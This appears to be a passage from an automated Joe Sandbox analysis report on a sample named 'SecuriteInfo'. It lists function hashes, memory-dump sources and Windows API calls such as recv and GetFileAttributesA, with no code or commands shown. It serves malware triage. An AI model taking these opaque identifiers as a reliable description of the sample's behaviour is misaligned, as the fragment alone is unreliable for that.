                                                                                                                                                                                                                                        • Opcode ID: d8562012e51dbddba154cf7e1b14f3479944ac0a282a334c95c116f59f1e984b
                                                                                                                                                                                                                                        • Instruction ID: f2f4eab4046208ef25017eb1f94f5cb59f34e0502636d898061a30b991f493cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8562012e51dbddba154cf7e1b14f3479944ac0a282a334c95c116f59f1e984b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3512E571E042449BDB24FB28DC4A7AD77F1AB45314FA042D8E8156B3E2DF359E80CB92
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00BC6644,?,00000000,?,00BC045F,?,00000004,00000000,?,?,?,00BBAD35), ref: 00BBC69D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 8b1ec243c14641f595eec7f3c147eb8cfb1ebddae365a541099f6ab123e79d82
                                                                                                                                                                                                                                        • Instruction ID: ca3c2612961d558a6b78da0790874dcffaa8e38f107f9b6cfbd5388a6b75001e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b1ec243c14641f595eec7f3c147eb8cfb1ebddae365a541099f6ab123e79d82
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7E06D365056216BE621A6659C41FFA3FC8DB4A3A0F3621A1FC1AA7190CEE0CC00C5E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?), ref: 00B88289
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: 563d61e3b81832be8f54a132ea9be34bcd874b4b353203e141661743c4fc77b2
                                                                                                                                                                                                                                        • Instruction ID: 903ee7092bbe6cbeb28ae469f77b3c93c96a3740bdaef41d434402293b7c5278
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 563d61e3b81832be8f54a132ea9be34bcd874b4b353203e141661743c4fc77b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3C08C30022E0807EE2C3D78088C8A83380AB8B3A46D81BC4E0715B0F2DA36980BE750
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?), ref: 00B88289
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: e27a71042fb7cbb15e331222ab08299eb21c890f82464cf23debb2eb21805089
                                                                                                                                                                                                                                        • Instruction ID: 4be5faf61b92237fd1e6112988b17de99bf2b45be8556410e609ed6cf49640b2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e27a71042fb7cbb15e331222ab08299eb21c890f82464cf23debb2eb21805089
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CC08C30022E0847EA2C7E68588C8343340EB473283E80BC8E0325B0F2DB33C807CBA0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B8ABF8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: ca7f5d678511776f2e038c389df875125d663074ae142914cbfd690c27d5d3eb
                                                                                                                                                                                                                                        • Instruction ID: 6a4c07dfffa2f1c8c40265fee54bf2db28be116f8eacc49c574319f42934271a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca7f5d678511776f2e038c389df875125d663074ae142914cbfd690c27d5d3eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4B10570A10268DFEB28DF18CD94BDEB7B5EF05304F5041D9E409A7291D775AA84CF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 45272bfe9e112c390ef0c5d878832319df250121f1e44b3615d8dc8562ff36ca
                                                                                                                                                                                                                                        • Instruction ID: 1ab435cac4e4a114c5e6a7e9eb1b4069d888f81e6b531c51c29e63bd7536acfd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45272bfe9e112c390ef0c5d878832319df250121f1e44b3615d8dc8562ff36ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F0BBDF048115AD511AC1966B5C6B56F2F669F3307328166F707E614397851749A330
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d2c15636fb2f561ffc8cb2116b822bea948b195a12be5dd8336ac0ab55e57497
                                                                                                                                                                                                                                        • Instruction ID: a321abe17f012fe8cc7db031a58f2d1f13fa13b8ad1d2ddc27a4aeaf0c0d009e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c15636fb2f561ffc8cb2116b822bea948b195a12be5dd8336ac0ab55e57497
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2F082DF08C121AC612AC1822B6C6B6AB2FB2DF3307728623F70B91047A795174D6235
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00000004,00000000), ref: 00B8D91B
                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00000008,00000000), ref: 00B8D950
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: recv
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                                                                                                                        • Opcode ID: 464ed1205dc4cf50616b11ac8f5913e87c8815040160fa7a1717ba75158bca4e
                                                                                                                                                                                                                                        • Instruction ID: d6573fa7d1a7a9abb7e95fb7758c78c596d5bb545dfe895bca05d0e207ac80aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 464ed1205dc4cf50616b11ac8f5913e87c8815040160fa7a1717ba75158bca4e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F831E4719002499BDB20DB69DCC1FAAB7F8EB08724F140266E515EB3E1DA34A805CBA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,00B9E5E2,?,00000003,00000003,?,00B9E617,?,?,?,00000003,00000003,?,00B9DB8D,00B82EB9,00000001), ref: 00B9E293
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1802150274-0
                                                                                                                                                                                                                                        • Opcode ID: e536e5b5decc855cdbdf413ab096571f19039892060fde8cb88743200bb0fc59
                                                                                                                                                                                                                                        • Instruction ID: dce90aead3dfc70c7bd22e33611f427b14f1f616cb6aa52b4e00a33396338e2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e536e5b5decc855cdbdf413ab096571f19039892060fde8cb88743200bb0fc59
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFD0223FA4227C938D162B88AC049ECBF9DDA06B103000062EC041B311CF50AC006BE0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1f442422d33f0868bf0c79f1080ccd6be3352d4e446fbac8e76e8f793560afab
                                                                                                                                                                                                                                        • Instruction ID: 3d8a18d8fa11e8174b17e809ce3931bf9f1b0f6e91d4ff11825fe55de453a119
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f442422d33f0868bf0c79f1080ccd6be3352d4e446fbac8e76e8f793560afab
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB51E672E005158FDB14CF28CC81B9DBBA1EF85314F1985ACE854EB3A6CB75E914C790
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a02e771294f7718b02e2a80da37b2f2ec11eeeab6dc968c48195b022f0de3731
                                                                                                                                                                                                                                        • Instruction ID: 28aa21c9b0de80d27f6982f4c138e196ee81d521d67d2f7468efe33ab8ad53f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a02e771294f7718b02e2a80da37b2f2ec11eeeab6dc968c48195b022f0de3731
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F115EFF14D110ADB025C5866F59AF6672EE1CA774732882AF507C1547E3D50A8E5232
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction ID: 144ea97e7975b203ab61b69a9b6ce756852e32bc85c45a331a6e996c9ca31030
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7111087720516943DA448A6DD4B4FB6A3D5EBC532D72C43FED0438F758D223E9459A02
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                        • Instruction ID: 853a721ce2fe648d865a30a75f1a1362272e4078b836a4e21938d6083b1e74f0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95E08C32911228EBCB28DB88C904DAAF3ECEB48B10B110096F601D3200C3B0DF00C7D0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: a5a757ab4249c1b823d79b006f25eb88b634771f80b439923f4b85943bf968f7
                                                                                                                                                                                                                                        • Instruction ID: 36cc1f5fafdac245c6703a2ecd5a9d4d338a5271674268a721ce7974f742ed3b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5a757ab4249c1b823d79b006f25eb88b634771f80b439923f4b85943bf968f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0701C477A046262726142018AC026BB57DCDBC1BB072A00AEFC44F72D1FFD9DC02D594
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 32384418-0
                                                                                                                                                                                                                                        • Opcode ID: 2cc06a32e33adb1919f8e167e722532a6364983e34ddb7b07eaa73e744dad334
                                                                                                                                                                                                                                        • Instruction ID: e740f091366d2521abfda5865a244a81a1317f2ae7b10cc8fe65a2dc113ce43c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cc06a32e33adb1919f8e167e722532a6364983e34ddb7b07eaa73e744dad334
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9A1EF70A00206AFDF21EB69C944B5AB7F8FF15714F1481B9E915D72A2EB34EA04CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: b937c37c902d0a52ba7d0c9503ef2c458f1f8a0b8a238071bf32596a1cb99ef3
                                                                                                                                                                                                                                        • Instruction ID: 3257f617a6fce0bb3f5f41653168d4162cacd5492257e50c9ea788a20124b150
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b937c37c902d0a52ba7d0c9503ef2c458f1f8a0b8a238071bf32596a1cb99ef3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20213E75A002199FDF00EFA5DC819BEBBB8FF59714F1000A9FA01A7251DB749D019BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:0.8%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:698
                                                                                                                                                                                                                                        Total number of Limit Nodes:4
